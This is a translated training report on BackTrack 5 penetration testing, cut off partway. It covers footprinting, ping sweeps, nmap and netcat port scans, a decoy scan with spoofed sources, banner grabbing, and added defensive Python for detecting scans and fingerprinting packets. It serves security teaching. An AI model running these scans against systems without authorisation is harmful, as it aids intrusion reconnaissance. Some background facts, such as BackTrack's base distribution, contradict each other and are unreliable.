PREFACE
First of all, we would like to sincerely thank Mr. V Thng, Director of the Athena Network Administration and Security Training Center, and Mr. L nh Nhn for their enthusiastic help in completing this document. We also thank the consultants and technical support staff at the Athena Center for supporting us and creating the conditions to complete the network security project on schedule. Sincerely! Implementing group: Nguyn Sn Kh, Tn Pht, Nguyn Cao Thng
TABLE OF CONTENTS
Introductory chapter: INTRODUCTION TO BACKTRACK 5
  I. Introduction
  II. Purpose
  III. Where to download Backtrack
  IV. Installation
    1. Live DVD
    2. Install
Chapter 1
  I. Introduction
  II. System and network security issues
    1. General issues of system and network security
    2. Some concepts and history of system security
    3. Types of security vulnerabilities and main network attack methods
Chapter 2: FOOTPRINTING
  I. Introduction to Footprinting
  II. Steps of Footprinting
    1. Determining our scope of activity
    2. Publicly available information
    3. Whois and DNS Enumeration
    4. DNS interrogation
    5. Network reconnaissance
  III. Footprinting methods
  IV. Footprinting tools
    1. Sam Spade
    2. Super Email Spider
    3. VitualRoute Trace
    4. Maltego
Chapter 3: SCANNING
  I. Introduction
  II. Functions
    1. Determining whether the system is alive
    2. Determining running or listening services
    3. Determining the operating system
Chapter 4: ENUMERATION
  I. What is Enumeration?
  II. Banner Grabbing
  III. Enumerating network services
    1. Http fingerprinting
    2. DNS Enumeration
    3. Netbios name
Chapter 5
  I. Introduction
  II. Password Cracking techniques
    1. Dictionary Attacks/Hybrid Attacks
    2. Brute Forcing Attacks
    3. Syllable Attacks/Pre-Computed Hashes
  III. Common attack types
    1. Active Password Cracking
    2. Passive Password Cracking
    3. Offline Password Cracking
  IV. Password Cracking tools
    1. Hydra
    2. Medusa
  V. Password Cracking on protocols
    1. HTTP (HyperText Transfer Protocol)
    2. SSH (Secure Shell)
    3. SMB (Server Message Block)
    4. RDP (Remote Desktop Protocol)
Chapter 6: SYSTEM HACKING
  I. INTRODUCTION TO METASPLOIT
    1. Introduction
    2. Components of Metasploit
    3. Using the Metasploit Framework
    4. Introduction to the Meterpreter payload
    5. Countermeasures
  II. The MS10-046 (2286198) vulnerability
    1. Introduction
    2. Attack steps
    3. Countermeasures
  III.
    1. Introduction
    2. Attack steps
    3. Countermeasures
Chapter 7
  I. Introduction
  II. Installing DVWA on Backtrack
    1. Downloading and installing XAMPP
    2. Downloading and installing DVWA
  III. Attack techniques on DVWA
    1. XSS (Cross-Site Scripting)
    2. SQL Injection
Introductory chapter: INTRODUCTION TO BACKTRACK 5
I. Introduction
Backtrack is a Live DVD Linux distribution developed for penetration testing. In Live DVD form, we can use Backtrack directly from the DVD without installing it on our machine. Backtrack can also be installed to the hard disk and used as an operating system. Backtrack is the merger of three different Linux penetration-testing distributions: IWHAX, WHOPPIX and Auditor. In its current version (5), Backtrack is based on the Ubuntu 11.10 Linux distribution. As of 19 July 2010, Backtrack 5 had been downloaded by more than 1.5 million users. The latest version is Backtrack 5 R2.
II. Purpose
The Backtrack toolkit has a fairly long development history across several Linux distributions. The current version uses the Slackware Linux distribution (Tomas M. (www.slax.org)). Backtrack continuously updates its tools, drivers and so on; Backtrack currently has over 300 tools for security research. Backtrack is the combination of two well-known security testing toolkits, Whax and Auditor.
Backtrack 5 contains a number of tools that can be used in our penetration testing process. The penetration testing tools in Backtrack 5.0 can be categorized as follows:
Information gathering: this category contains a number of tools that can be used to obtain information about a target's DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is collected from what is available on the Internet, without touching the target environment.
Network mapping: this category contains tools that can be used to check which hosts exist, information about the OS and the applications used by the target, and also to do port scanning.
Vulnerability identification: in this category we find tools that scan for vulnerabilities (in general) and in Cisco devices. It also contains tools for performing and analyzing Server Message Block (SMB) and Simple Network Management Protocol (SNMP).
Web application analysis: this category contains tools that can be used to monitor and inspect web applications.
Radio network analysis: to test wireless networks, Bluetooth and radio frequency identification (RFID), we can use the tools in this category.
Penetration: this category contains tools that can be used to exploit the vulnerabilities found on target machines.
Privilege escalation: after exploiting vulnerabilities and gaining access to the target machines, we can use the tools in this category to raise our privileges to the highest level.
Maintaining access: the tools in this category help us maintain access to the target machines. We may need the highest privileges before we can install tools for maintaining access.
Voice Over IP (VOIP): to analyze VOIP we can use the tools in this category.
Digital forensics: in this category we find tools that can be used for digital forensic analysis, such as acquiring hard disk images, examining file structure, and analyzing hard disk images. To use the tools in this category we can choose Start Backtrack Forensics in the boot menu. Sometimes it is necessary to mount the internal hard disk and swap files in read-only mode to preserve their integrity.
Reverse engineering: this category contains tools that can be used to debug a program or disassemble an executable file.
III. Where to download Backtrack:
IV. Installation
1. Live DVD
If we want to use Backtrack without installing it to the hard disk, we can burn the ISO image file to a DVD and boot our computer from the DVD. Backtrack then runs from the DVD. The advantage of using Backtrack as a Live DVD is that it is very easy to do and we do not have to interfere with the current configuration of our machine. However, this method also has some disadvantages. Backtrack may not work with the hardware, and any configuration changes made to get the hardware working will not be saved with the Live DVD. In addition, it is slow, because the computer has to load programs from the DVD.
2. Install
a) Installing on a physical machine:
We need to prepare a partition to install Backtrack on. Then run the Backtrack Live DVD. At the login screen, use the username root and the password toor. Then, to enter graphical mode, type startx and we are in the graphical mode of Backtrack 5. To install Backtrack 5 to the hard disk, select the file named install.sh on the desktop and proceed with the installation. However, if the file cannot be found, we can use ubiquity to install. To use ubiquity, open a Terminal and type ubiquity.
The installation window is then displayed. Answer a few questions such as the city we live in, the keyboard layout, the disk partition to install to, and so on, then proceed with the installation.
b) Installing in a virtual machine:
The advantage is that we do not need to prepare a partition for Backtrack, and we can use another OS at the same time. The disadvantages are slower speed and that wireless cannot be used, except for USB wireless adapters. We can use the VMWare file provided by BackTrack. With it we have BackTrack on a virtual machine very easily and quickly. The configuration in the VMWare file is: memory 768MB, hard disk: 30GB, Network: NAT. To use the physical network card, we must set Network to Bridged. Below are some images from installing BackTrack on a VMWare virtual machine.
Click Install to begin the installation.
The installation process begins.
Chapter 1:
I. Introduction
Computer network security is entirely a human problem, so establishing a legal framework and specific working rules is necessary. Here the legal framework may include provisions in state law, sub-law documents, and so on. Specific regulations are set by each organization to suit its own characteristics, for example rules on personnel, on the use of machines, on the use of software, etc. Thus, securing a computer network system is most effective once we thoroughly implement solutions concerning policy and people. In summary, computer network security is a large problem that requires an overall solution, not only computer software and hardware but also policy and people. And this must be carried out continuously: it can never be solved completely, because new problems always arise over time. However, with reasonable overall solutions, and especially by handling policy and people well, we can create more certain safety for ourselves.
II. System and network security issues
1. General issues of system and network security
A common characteristic of a network system is that it is shared by many users and is geographically distributed, so protecting resources (against loss or improper use) is much more complex than in a single-computer or single-user environment. The activities of the network administrator must ensure that information on the network is reliable and used for the right purposes and by the right people, and that the network operates stably without being attacked by saboteurs. In reality, however, no network is absolutely secure: however well a system is protected, at some point it will be defeated by malicious people.
2. Some concepts and history of system security
a) Network attackers (intruders)
An intruder is an individual or organization that uses knowledge of networks and sabotage tools (hardware or software) to probe for weaknesses and security vulnerabilities on a system, carrying out intrusion and illegitimately seizing resources. Some types of network attackers are: Hacker: someone who intrudes into the network illegally by using password-cracking tools or exploiting weaknesses of the access components on the system. Masquerader: someone who fakes information on the network, such as spoofing IP addresses, domain names or user identities. Eavesdropping: someone who eavesdrops on information on the network using Sniffer tools, then uses analysis and debugging tools to extract valuable information. Network attackers may have many different goals, such as stealing economically valuable information, sabotaging a targeted network system, or even acting without conscious intent.
b) Security vulnerabilities
Security vulnerabilities are weaknesses in the system, or hidden in a service, that an attacker can rely on to intrude illegally into the system in order to carry out sabotage or seize resources illegally. There are many causes of security vulnerabilities: faults in the system itself, in the supplied software, or a weak administrator who does not understand the provided services deeply. The degree to which vulnerabilities affect the system varies: some affect only the quality of the provided service, while others affect the whole system or destroy it.
c) Security policy
A security policy is the set of rules applied to those who participate in administering the network and who use network resources and services. Each situation requires a different security policy. The security policy helps users know their responsibility in protecting network resources, and also helps the network administrator establish effective measures while equipping, configuring and controlling the operation of the system and network.
3. Types of security vulnerabilities and main network attack methods
a) Types of vulnerabilities
Many organizations have classified the known types of vulnerabilities. According to the US Department of Defense, vulnerabilities are divided into three types, as follows:
Type C vulnerability: allows attacks of the DoS (Denial of Service) form. Low severity: it only affects the quality of service, stalling or interrupting the system, without corrupting data or gaining illegal access. DoS is a form of attack that uses Internet-layer protocols of the TCP/IP suite to stall the system, leading to legitimate users being denied access to or use of the system. Services with vulnerabilities that allow DoS attacks can be upgraded or fixed with newer versions from the service vendors. At present there is no effective measure against this type of attack, since the design of the Internet layer (IP) in particular, and of the TCP/IP suite in general, carries the latent risk of this type of vulnerability.
Type B vulnerability: allows users to gain additional rights on the system without a validity check, leading to the loss of information that should be protected. This vulnerability usually exists in applications on the system. Its severity is medium. A Type B vulnerability is more dangerous than a Type C one: it allows internal users to gain higher privileges or illegal access. These vulnerabilities usually appear in services on the system. A local user is understood as a person who has access to the system with certain limited rights. Another form of Type B vulnerability occurs with programs written in C. Programs written in C commonly use a buffer, an area in memory used to store data before processing. Programmers usually use a buffer in memory before assigning a memory area to each data block. For example, when writing a program that reads a user-name field, the programmer limits this field to 20 characters with the declaration: char first_name[20]; This declaration allows the user to enter at most 20 characters. When data is entered it is first stored in the buffer. When the user enters more than 20 characters, the buffer overflows. The excess characters lie outside the buffer and cannot be controlled. Attackers can exploit these vulnerabilities by entering special characters to execute certain commands on the system. Usually these vulnerabilities are exploited by users on the system to gain illegitimate root privileges. To limit Type B vulnerabilities, the configuration of the system and its programs must be strictly controlled.
Type A vulnerability: allows someone outside the system to gain illegal access to the system and possibly destroy the whole system. This type of vulnerability is very dangerous and threatens the integrity and confidentiality of the system. These vulnerabilities usually appear in systems that are poorly administered or whose network configuration is not controlled. They are extremely dangerous because they exist ready-made in the software in use; an administrator who does not understand the service and the software deeply may overlook this weakness. Therefore one must regularly check the announcements of security newsgroups on the network to detect vulnerabilities of this type. A number of old versions of commonly used programs have Type A vulnerabilities, such as: FTP, Gopher, Telnet, Sendmail, ARP, finger.
Scanner
A Scanner is a program that automatically scans for and detects security weaknesses on a local workstation or a remote one. A saboteur using a Scanner program can detect security vulnerabilities on a remote server. Its mechanism is to scan for and detect the TCP/UDP ports in use on the target system and the services used on that system. The Scanner records the responses from the remote system corresponding to the services it detects, and from those it can find weaknesses of the system. The factors needed for a Scanner to operate are: Equipment and system requirements: an environment that supports TCP/IP; the system must be connected to the Internet. Scanner programs play an important role in a security system, because they can detect weaknesses in a network system.
Password Cracker
A program capable of decoding an encrypted password or disabling the password protection function of a system. Password-cracking programs work on different principles. Some programs generate a limited list of words, apply some encryption algorithm to them and compare the result with the encrypted password; if they do not match, they create another list according to the program's logic. When a match with the encrypted password is found, the attacker has the password in text form. The text password is usually written to a file. The remedy for this kind of sabotage is to build a proper password protection policy.
Sniffer
Sniffers are tools (hardware or software) that capture the information flowing on the network and extract valuable information exchanged on it. A Sniffer can capture information exchanged between many workstations. It captures packets from the IP layer downwards. IP-layer protocols are publicly defined with clear header field structures, so decoding these packets is not difficult. The purpose of sniffer programs is to set promiscuous mode on the Ethernet network cards where packets are exchanged in the network, in order to "capture" information. Sniffer devices can capture all information exchanged on the network thanks to the broadcast principle of packets in Ethernet networks. However, setting up a sniffer system is not simple, because it requires intruding into the network system and installing the sniffer software. Sniffer programs also require the user to understand the architecture and network protocols deeply. Detecting that a system is being sniffed is not simple, because the sniffer operates at a very low layer and does not affect the applications or the services the system provides. However, building measures to limit sniffers is not too difficult if we follow security principles such as: do not allow strangers to access devices on the system; manage the system configuration strictly; establish highly secure connections through encryption mechanisms.
Trojans
A Trojan is a program that runs illegitimately on a system, in the role of a legitimate program. The Trojan can run because legitimate programs have had their code changed into illegitimate code. For example, virus programs are a typical type of Trojan. Viruses usually hide code segments inside legitimately used programs. When those programs are activated, the hidden code segments execute and perform functions the user is not aware of, such as stealing passwords or copying files without the user knowing. A Trojan program performs one of the following tasks: it performs a few functions, or helps its programmer discover important or personal information on a system or on only a few components of that system; or it hides a few functions, or helps its programmer discover important or personal information on a system or on only a few of its components. There are also Trojan programs that perform both functions. Some Trojan programs can even destroy the system by destroying the information on the hard disk. But nowadays Trojans of this kind are easily detected and rarely take effect. However, there are more serious cases where attackers create security holes through Trojans, obtain root privileges on the system, and use that right to destroy part or all of the system, or use root to change log files and install other trojan programs that the administrator cannot detect, causing very serious damage; the administrator then has no choice but to reinstall the whole system.
Chapter 2: FOOTPRINTING
I. Introduction to Footprinting
Footprinting is a technique for searching for information about a business, individual or organization. It is one of the 3 phases that must be carried out to perform an attack. An attacker spends 90% of the time collecting and searching for information and 10% performing the attack. The result of the footprinting process is basic information about the attack target: name, company address, website, members of the company, network numbers, and so on. Information to search for: Internet: domain, network blocks, IP, TCP or UDP, system enumeration, ACLs, IDSes, ... Intranet: ... Remote access: remote system type, ... Extranet: connection origination and destination, ...
II. Steps of Footprinting
It includes the following steps:
1. Determining our scope of activity
The first order of business is to determine the scope of our footprinting activities. It can be a daunting task to identify all the entities in an organization. However, hackers show us no mercy in this fight. They exploit weaknesses in whatever form. We do not want hackers to know much about our security posture.
2. Publicly available information
The amount of information readily available about us, our organization and anything we can imagine is nothing short of amazing. This information may include: the company website; related organizations; physical location; detailed employee information; current events; security and privacy policies.
3. Whois and DNS Enumeration
View detailed information about the IP address, name server, DNS server, and so on.
4. DNS interrogation
After identifying all the related domains, we begin DNS queries. DNS is a distributed database used to map IP addresses to hostnames. If DNS is not configured securely, it is very likely that information can be leaked from the organization.
5. Network reconnaissance
Now that we have identified the potential networks, we can determine the network topology as well as the possible access paths into the network.
III. Footprinting methods
There are 2 methods of Footprinting: Active Footprinting: contact the target directly to learn the needed information. Passive Footprinting: search through articles, websites, or the target's competitors, etc. Websites: www.google.com, http://whois.domaintools.com, www.whois.net, www.arcchive.org, www.tenmien.vn
Whois : athena.com.vn
Tenmien.vn
Archive: http://www.microsoft.com
IV. Footprinting tools: Sam Spade, Super Email Spider, VitualRoute Trace, Google Earth, Whois, Site Digger, Maltego, ...
1. Sam Spade
Lets the user perform actions such as: Ping, Nslookup, Whois, Traceroute, ...
2. Super Email Spider
Searches for the email addresses of an agency or organization using search engines: Google, Lycos, iWon, Exiter, Hotbot, MSN, AOL, ...
3. VitualRoute Trace
4. Maltego
A tool used to discover links between: users, agencies, organizations, websites, domains, network ranges, IP addresses, ...
Chapter 3: SCANNING
I. Introduction
If footprinting is determining where the sources of information are, scanning is finding all the doors through which those sources can be entered. During footprinting we obtained a list of IP network ranges and IP addresses through many different techniques, including whois and ARIN queries. These techniques give the security administrator, as well as the hacker, much valuable information about the target network, IP ranges, DNS servers and mail servers. In this chapter we will determine which systems are listening on the network and are reachable, using many tools and techniques such as ping sweeps and port scans. We can also bypass firewalls by hand to scan systems that are supposedly blocked by filtering rules.
II. Functions
1. Determining whether the system is alive
One of the most basic steps in mapping a network is a ping sweep over a range of network and IP addresses to determine whether devices or systems are alive. Ping is traditionally used to send ICMP ECHO packets to the target system in an attempt to receive an ICMP ECHO REPLY, which shows the system is alive. Ping is acceptable for determining the number of live systems in small and medium networks (a class C has 254 and a class B 65534 addresses), but it can take hours or days to complete for a class A network with 16277214 addresses.
a) Network Ping Sweeps
Network pinging is the act of sending various types of network traffic to a target and analyzing the results. Pinging uses ICMP (Internet Control Message Protocol). It can also use TCP or UDP to find live hosts. To perform an ICMP ping sweep we can use fping, nmap, and so on: fping -a -g 192.168.10.1 192.168.10.10 where -a shows live hosts (alive) and -g gives the address range: 192.168.10.0/24 or as above.
Countermeasure: we can use pingd to handle all ICMP ECHO and ICMP ECHO REPLY traffic at the host level. This is achieved by removing support for ICMP ECHO processing from the system kernel. Basically, it provides a host-level access control mechanism.
b) ICMP query
Ping sweeps (or ICMP ECHO packets) are just the tip of the iceberg when it comes to ICMP information about a system. We can collect many kinds of valuable information simply by sending ICMP packets. We can request the netmask of a device with an Address Mask Request. The netmask is important because it lets us determine all the target's subnets, the default gateway and the broadcast address. Knowing the default gateway, we can attack the router. With the broadcast address. However, not every router supports Timestamp and Netmask requests. Countermeasure: block the ICMP types that disclose information at the border router (the router facing the ISP). To reduce this to a minimum, we should use access lists (ACLs): access-list 101 deny icmp any any 13 // timestamp request; access-list 101 deny icmp any any 17 // address mask request.
2. Determining running or listening services
a) Port scanning
Port scanning is the process of sending packets to TCP and UDP ports on the target system to determine which services are running or in the listening state. Identifying listening ports is very important for determining the running services. In addition, we can determine the type and version of the operating system and the applications in use.
b) Scan types
Before port scanning, we should review some of the available scan methods:
TCP Connect scan: this type connects to the target port and completes the full three-way handshake (SYN, SYN/ACK, ACK). However, it is easily detected by the target system. It uses system calls instead of raw packets and is usually used by unprivileged Unix users, for whom a SYN scan is not possible.
TCP SYN scan: it does not open a full connection but only sends a SYN packet (the first step of the three-way handshake) to the target. If a SYN/ACK packet is returned, we know the port is listening. Conversely, if RST/ACK is received, the port is not listening. This technique is harder to detect than TCP connect, because it does not leave a record on the target machine. However, one disadvantage of this technique is that it can create a denial-of-service (DoS) condition if too many half-open connections are created. So the technique is safe as long as not too many such connections are created.
TCP ACK scan: this technique is used to map firewall rule sets. It can help determine whether the firewall is a simple packet filter that allows established connections, or an advanced filter. However, it cannot distinguish open ports from closed ones.
TCP Window scan: like the ACK scan, the difference being that it can distinguish open ports from closed ones.
UDP scan: this technique sends a UDP packet to the target port. If the target replies with an ICMP port unreachable message, the port is closed. If no such message is received, the port is open. However, UDP scanning is a very slow process if we try to scan a device that applies a strong packet filtering policy.
TCP FIN, XMAS, NULL: these are adept at slipping past firewalls to discover the systems behind them. However, they depend heavily on how the target system handles the packets; some systems (typically Windows) show no distinguishing response.
Strobe: highly reliable, but it supports only TCP, not UDP.
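The scan types above are easier to reason about from the defender's side once you see what they look like in logs. The following is an added example, not part of the original report or of the Backtrack tools it describes: a small Python detector run over constructed firewall-style log lines (fields: source, destination, protocol, ICMP type or TCP port) that flags an ICMP ECHO sweep, the ICMP timestamp and address-mask requests (types 13 and 17) that the access list above denies, and a one-source-many-ports TCP scan. The log format and the thresholds are assumptions made for the example.

```python
from collections import defaultdict

# Constructed sample log (not captured traffic). Fields: src dst proto id
# For icmp, id is the ICMP type; for tcp, id is the destination port.
SAMPLE_LOG = """\
192.168.10.50 192.168.10.102 tcp 80
192.168.10.200 192.168.10.1 icmp 8
192.168.10.200 192.168.10.2 icmp 8
192.168.10.200 192.168.10.3 icmp 8
192.168.10.200 192.168.10.4 icmp 8
192.168.10.200 192.168.10.5 icmp 8
192.168.10.200 192.168.10.6 icmp 8
192.168.10.200 192.168.10.7 icmp 8
192.168.10.200 192.168.10.8 icmp 8
192.168.10.200 192.168.10.9 icmp 8
192.168.10.200 192.168.10.10 icmp 8
192.168.10.50 192.168.10.102 tcp 80
192.168.10.201 192.168.10.1 icmp 13
192.168.10.201 192.168.10.1 icmp 17
10.10.10.5 192.168.10.102 tcp 21
10.10.10.5 192.168.10.102 tcp 22
10.10.10.5 192.168.10.102 tcp 23
10.10.10.5 192.168.10.102 tcp 25
10.10.10.5 192.168.10.102 tcp 80
10.10.10.5 192.168.10.102 tcp 110
10.10.10.5 192.168.10.102 tcp 139
10.10.10.5 192.168.10.102 tcp 443
10.10.10.5 192.168.10.102 tcp 445
10.10.10.5 192.168.10.102 tcp 3389
192.168.10.50 192.168.10.102 tcp 443
"""

ICMP_ECHO_REQUEST = 8
# The two ICMP types the text's access-list 101 denies at the border router.
ICMP_INFO_TYPES = {13: "timestamp request", 17: "address mask request"}


def parse_line(line):
    """Split one log line into its four fields; return None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 4 or parts[2] not in ("icmp", "tcp") or not parts[3].isdigit():
        return None
    src, dst, proto, ident = parts
    return {"src": src, "dst": dst, "proto": proto, "id": int(ident)}


def analyze(log_text, sweep_threshold=8, scan_threshold=8):
    """Return the three indicators: ping sweeps, ICMP information probes, TCP port scans.

    Thresholds (assumed for this example): a source that sends ICMP ECHO to at
    least sweep_threshold distinct hosts is a sweep; a source that touches at
    least scan_threshold distinct TCP ports on one host is a port scan.
    """
    echo_targets = defaultdict(set)   # src -> set of hosts that received ICMP ECHO
    probed_ports = defaultdict(set)   # (src, dst) -> set of distinct TCP ports
    info_probes = []                  # (src, dst, description) for ICMP 13/17
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["proto"] == "icmp":
            if rec["id"] == ICMP_ECHO_REQUEST:
                echo_targets[rec["src"]].add(rec["dst"])
            elif rec["id"] in ICMP_INFO_TYPES:
                info_probes.append((rec["src"], rec["dst"], ICMP_INFO_TYPES[rec["id"]]))
        else:
            probed_ports[(rec["src"], rec["dst"])].add(rec["id"])
    ping_sweeps = {src: len(hosts) for src, hosts in echo_targets.items()
                   if len(hosts) >= sweep_threshold}
    port_scans = {pair: sorted(ports) for pair, ports in probed_ports.items()
                  if len(ports) >= scan_threshold}
    return {"ping_sweeps": ping_sweeps,
            "icmp_info_probes": info_probes,
            "port_scans": port_scans}


if __name__ == "__main__":
    for kind, hits in analyze(SAMPLE_LOG).items():
        print(kind, hits)
```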
c) Netcat
Netcat is a simple Unix network utility that reads and writes data across network connections using the TCP/IP protocol. It is designed as a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a network debugging tool with many features and an exploration tool. nc -v -z -w2 192.168.10.102 1-4000 where -v prints details to the screen; -z is zero-I/O mode, which sends no data and only emits a packet; 192.168.10.102 is the host; 1-4000 are the ports to scan.
Nmap
Nmap (Network Mapper) is a free, open-source utility for network discovery and security auditing. Many network and system administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services (application name and version) those hosts are offering, which operating systems (and OS versions) they are running, what type of packet filters or firewalls are in use, and many other characteristics. It was designed to rapidly scan large networks, but also works against single hosts. Nmap runs on all major operating systems, and official binary packages are available for Linux, Windows and Mac OS X. The simplest usage, with no parameters: nmap 192.168.10.0/24
a. Resolve <target> from a hostname to an IPv4 address using DNS. If it is already an IP address, no resolution is needed.
b. Ping the host, by default with an ICMP echo request and a TCP ACK packet sent to port 80, to determine whether the host is up. If it is not, nmap exits with a message. We can use Ping NULL (-PN) to skip this step.
c. Resolve the target IP back to a name with a reverse DNS query. This can be skipped with the -n option to improve speed and avoid detection.
d. Perform a TCP port scan of the 1000 most common ports listed in nmap-services. A SYN scan is performed, but a Connect scan is substituted when a non-root Unix user lacks the privileges needed to send raw packets.
e. Print the results to the screen.
Scanning for hosts that are up: nmap -sP -PE 192.168.10.0/24 where -sP is a ping scan and -PE uses ping echo.
Depending on the complexity of the target network and hosts, the scan can easily be detected. Nmap provides the ability to spoof source addresses with the -D decoy option. It is designed to flood the target site with spoofed information. The basic idea behind this option is to run spoofed scans at the same time as the real scan. The target system then replies to the spoofed addresses as well as to our real port scan. Most importantly, the decoy addresses must be alive; otherwise the SYN scan could lead to a denial-of-service condition. nmap -sS -PE 192.168.10.0/24 -D 10.10.10.1
d) Countermeasures:
Disable all unnecessary services. On Unix, we can do this by reviewing the unnecessary services in /etc/inetd.conf and disabling the services started from startup scripts. On Windows it is very hard to disable unnecessary services, because of the way Windows works: TCP ports 139 and 445 provide many functions needed for Windows to operate.
3. Determining the operating system
Many powerful tools and port-scanning techniques are available for finding the open ports on a target system. Looking back, our first objective was port scanning to identify the TCP and UDP ports on the target. With that information we can determine which listening ports have weaknesses. But we need more information about the target, namely the operating system.
a) Active OS Detection
The more detailed the operating system information, the more useful it is for analyzing weaknesses. We can use the banner-grabbing technique, which tries to obtain information from services such as FTP, telnet, SMTP and HTTP. This is the simplest way to detect the operating system and the version it runs. Accordingly, the proper technique is stack fingerprinting. It is a very powerful technique that lets us identify the target operating system with high confidence. Stack fingerprinting requires at least one listening port on the target. Nmap can still make a guess when no port is open.
Active OS detection sends packets to the target to determine detailed characteristics of its network stack, which lets us guess the operating system. Because such packets must be sent, it is easily detected, and so this is not the approach hackers use to attack. Nmap with -O identifies the operating system.
b) Passive OS Detection
This uses passive stack fingerprinting. The concept is similar to active stack fingerprinting. Instead of sending packets to the target, which is easily detected, the attacker silently monitors network traffic to determine the operating system in use. Thus, by monitoring the network traffic between different systems, we can determine their operating systems. This technique depends on a central position on the network and on a port that allows packet capture.
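The following is an added example, not code from the original report: a Python sketch of passive stack fingerprinting that parses the IPv4 and TCP headers of a captured SYN and guesses the sender's OS family from its initial TTL, the way p0f-style tools do. The packets are constructed inline (no live capture), and the three-entry TTL table and the absence of window-size and TCP-option matching are simplifications assumed for the example.

```python
import struct

# Illustrative initial-TTL table (assumption for this example; real passive
# fingerprinters also match window size, TCP options and the DF bit).
INITIAL_TTLS = {64: "Linux/Unix-like", 128: "Windows", 255: "Cisco/Solaris-class"}


def build_syn(ttl, window, flags=0x02, src_ip="192.168.10.50",
              dst_ip="192.168.10.102", sport=40000, dport=80):
    """Construct a minimal IPv4 + TCP header as it would appear on the wire
    (constructed sample packet: checksums left zero, no TCP options)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, 40, 0x1234, 0x4000, ttl, 6, 0,
                         bytes(int(o) for o in src_ip.split(".")),
                         bytes(int(o) for o in dst_ip.split(".")))
    tcp_hdr = struct.pack("!HHIIBBHHH",
                          sport, dport, 1, 0, 5 << 4, flags, window, 0, 0)
    return ip_hdr + tcp_hdr


def fingerprint(packet):
    """Parse the IPv4 and TCP headers of one captured packet and, if it is an
    initial SYN, return the passive fingerprint fields and an OS guess."""
    if len(packet) < 40:
        raise ValueError("too short for IPv4 + TCP headers")
    (ver_ihl, _tos, _length, _ident, _frag, ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP packet")
    ihl = (ver_ihl & 0x0F) * 4
    (_sport, dport, _seq, _ack, _off, flags, window,
     _tcsum, _urg) = struct.unpack("!HHIIBBHHH", packet[ihl:ihl + 20])
    if flags & 0x12 != 0x02:          # SYN set and ACK clear: only the initial SYN
        return None
    # The TTL is decremented once per hop, so the nearest common initial value
    # at or above the observed TTL gives both the OS family and the hop count.
    initial = next((t for t in sorted(INITIAL_TTLS) if ttl <= t), None)
    return {
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
        "dport": dport,
        "ttl": ttl,
        "initial_ttl": initial,
        "hops": None if initial is None else initial - ttl,
        "window": window,
        "os_guess": INITIAL_TTLS.get(initial, "unknown"),
    }


if __name__ == "__main__":
    # A SYN seen three hops away from a host whose stack started at TTL 64.
    print(fingerprint(build_syn(61, 29200)))
```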
Chapter 4: ENUMERATION
I. What is Enumeration?
Enumeration is the next step in the process of gathering information about an organization; it takes place after scanning and is the process of collecting and analyzing user names, machine names, shared resources and services. It also actively queries or connects to the target to obtain more useful information. Enumeration can be defined as the process of extracting the information obtained in the scanning phase into an orderly system. The extracted information includes things related to the attack target, such as user names, host names, services and shares. Enumeration techniques are carried out from within the target environment. Enumeration includes connecting to the system and directly extracting information. The purpose of enumeration is to identify user accounts and system accounts that can be used to hack a target. It is not necessary to find an administrator account, because we can escalate this account to the level with the highest privileges, allowing access to more accounts than were granted before.
II. Banner Grabbing
The main enumeration technique is banner grabbing. It can be defined simply as connecting to a remote application and observing the output. It yields much information for a remote attacker. At a minimum we can determine the service and its version, which in many cases forms the basis of researching weaknesses. Countermeasure: disable unnecessary services. We can limit access to services with network access control.
III. Enumerating network services
1. HTTP fingerprinting
a) Telnet
TELNET (short for TerminaL NETwork) is a network protocol used on connections to the Internet or to local area networks (LAN). The IETF document STD 8 (also known as RFC 854 and RFC 855) states that the purpose of the TELNET protocol is to provide a fairly general, bi-directional, eight-bit byte oriented communications facility. TELNET is a client-server protocol based on TCP; the client (user) normally connects to port 23 on a server, which provides the application program that executes the services.
Use telnet to learn about an open service port, using the remote tool to retrieve information through the telnet port that almost all operating systems support. C:\>telnet www.google.com 80
b) Netcat
A tool that reads and writes data over the TCP and UDP protocols. Netcat can be used as a port scanner, backdoor, port redirector, port listener, and so on. Netcat is used from the command line: - Connect mode: nc [-options] hostname port1[-port2]
- Listen mode: nc -l -p port [-options] [hostname] [port] Example: grab the server's banner: nc -n 192.168.10.102, port 80. Port scanning (figure).
c) OpenSSL
It is a collaborative effort to develop a full-featured open source toolkit implementing the SSL protocol (version 2 and version 3) and the TLS protocol (version 1), managed by a worldwide community of volunteers who use the Internet to communicate and to develop OpenSSL and its related documentation. Most software such as IMAP & POP, Samba, OpenLDAP, FTP, Apache and others requires the user to be authenticated before the service may be used. By default, however, the user's identity and password are transmitted as plain text, so they can be read or modified by someone else. Encryption such as SSL guarantees the safety and integrity of the data; with this technique, information transmitted over the network is encrypted end to end. Once OpenSSL is installed on a Linux server we can use it as a third-party tool that lets other applications use SSL. OpenSSL is a cryptographic toolkit implementing the SSL and TLS network protocols and the related cryptographic standards. The OpenSSL program is a command-line tool that exposes the cryptographic functions of OpenSSL's crypto library. OpenSSL provides libraries that offer cryptographic functions to applications such as secure web servers. It is open-source software that can be used for both commercial and non-commercial purposes, with strong encryption available worldwide; it supports the SSLv2, SSLv3 and TLSv1 protocols, both RSA and Diffie-Hellman encryption, and DSO. It supports OpenSSL and RSAref US, has improved passphrase handling for private keys, X.509 certificate based authentication for both client and server, support for X.509 certificate revocation lists, and the ability to fine-tune the SSL handshake parameters per URL.
2. DNS Enumeration
